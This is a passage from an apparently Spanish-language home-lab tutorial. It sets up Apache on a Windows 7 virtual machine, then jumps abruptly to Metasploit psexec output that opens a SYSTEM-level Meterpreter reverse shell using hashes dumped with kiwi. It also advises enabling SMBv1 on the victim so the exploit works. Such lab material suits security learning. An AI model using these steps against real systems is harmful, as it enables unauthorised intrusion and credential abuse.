Una vez descargado, lo descomprimimos y nos dara una carpeta con 3 archivos, solo nos interesa la carpeta llamada Apache24 por lo que la moveremos a la ruta C:\.
Una vez que la carpeta este ahi, necesitaremos instalar las dependencias, que seran las siguientes.
URL mega (Winsows 7 Service Pack 1 - 64 bits) = https://mega.nz/file/lbZyHQoS#h8B3jmgcNSKI9KMvVjuXzqnrdMqtb40rsgpJHmBSSDI
URL (Versión de Microsoft Visual C++ Redistributable más reciente) = https://learn.microsoft.com/es-es/cpp/windows/latest-supported-vc-redist?view=msvc-170
Primero descomprimiremos el archivo Winsows 7 Service Pack 1 - 64 bits y lo ejecutaremos, esto tardara un poco ya que se estara instalando un paquete en el S.O. y se reiniciara varias veces, una vez instalado, descomprimiremos el segundo archivo llamado VC_redist.x64 o la arquitectura que se haya descargado, lo instalaremos y una vez instalados estos 2 archivos, cambiaremos una pequeña configuracion del apache24.
cdC:\apache24\conf\notepad httpd.conf
Esto abrira un archivo de texto con la configuracion del apache, por lo que nos iremos a una linea comentada llamada #Listen www.example.com:80 y lo cambiaremos por lo siguiente (Quitando el #).
Listen 0.0.0.0:8080
Para que asi escuche en todas las direcciones de red, a parte comentaremos poniendo un # donde pone Listen 80 quedara algo tal que asi.
#Listen 80
Despues y por ultimo nos iremos a la siguiente linea llamada #ServerName 10.10.10.10:80 en vuestro caso la IP sera diferente, pero tendremos que quitar ese #, esa IP y poner lo siguiente.
ServerName localhost:8080
Una vez cambiado todo esto, lo guardaremos y haremos lo siguiente en terminal.
cdC:\Apache24\bin
Instalar apache como un servicio por si acaso.
httpd.exe-kinstall-n"Apache2.4"
Iniciar el servicio de apache.
httpd.exe-kstart-n"Apache2.4"
Y para comprobar que todo funciona correctamente lo verificaremos de la siguiente manera.
netstat-an|find"8080"
Tendras que ver algo asi:
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
Y si nos vamos a http://localhost/ tendriamos que ver nuestro apache y cuando hagamos un nmap, deberiamos de ver el puerto apache (80) abierto.
[*] Started reverse TCP handler on 192.168.5.199:4444
[*] 192.168.5.141:445 - Connecting to the server...
[*] 192.168.5.141:445 - Authenticating to 192.168.5.141:445 as user 'Administrador'...
[!] 192.168.5.141:445 - peer_native_os is only available with SMB1 (current version: SMB2)
[*] 192.168.5.141:445 - Uploading payload... WHSNLJPY.exe
[*] 192.168.5.141:445 - Created \WHSNLJPY.exe...
[*] Sending stage (176198 bytes) to 192.168.5.141
[+] 192.168.5.141:445 - Service started successfully...
[*] 192.168.5.141:445 - Deleting \WHSNLJPY.exe...
[*] Meterpreter session 3 opened (192.168.5.199:4444 -> 192.168.5.141:49216) at 2024-07-30 17:23:22 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Y con esto ya nos habriamos autenticado como administradores mediante SMB y los hashes que dumpeamos con kiwi.
AVISO
Si no funcionara el exploit de psexec revisar que es con el usuario administrador, por que otro usuario no funciona a no ser que tenga privilegios de administrador, y si siguiera fallando teneis que aseguraros de que el SMB es v1, por que con la v2 no va a ir.
Cambiar SMB a v1
Abre el gestor de archivos con lo siguiente.
Windows + R y escribe regedit
Ahora nos tendremos que ir a la siguiente ubicacion.
Despues dentro de esa carpeta añadiremos lo siguiente.
Agregar Clave:
En el panel derecho, haz clic derecho en un espacio vacío y selecciona Nuevo > Valor DWORD (32 bits).
Nombra la nueva entrada como SMB1.
Haz doble clic en la entrada SMB1 y establece el valor en 1 para habilitar SMB1. Modificar Clave Existente:
Si ya existe una entrada llamada SMB1, haz doble clic en ella y asegúrate de que el valor sea 1.
Una vez hecho esto lo podremos comprobar desde la maquina atacante de la siguiente forma.
nmap-p445--scriptsmb-protocols<IP>
Y se tendria que ver algo asi:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-30 17:31 CEST
Nmap scan report for 192.168.5.141
Host is up (0.00028s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CF:D6:A6 (VMware)
Host script results:
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2:0:2
|_ 2:1:0
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds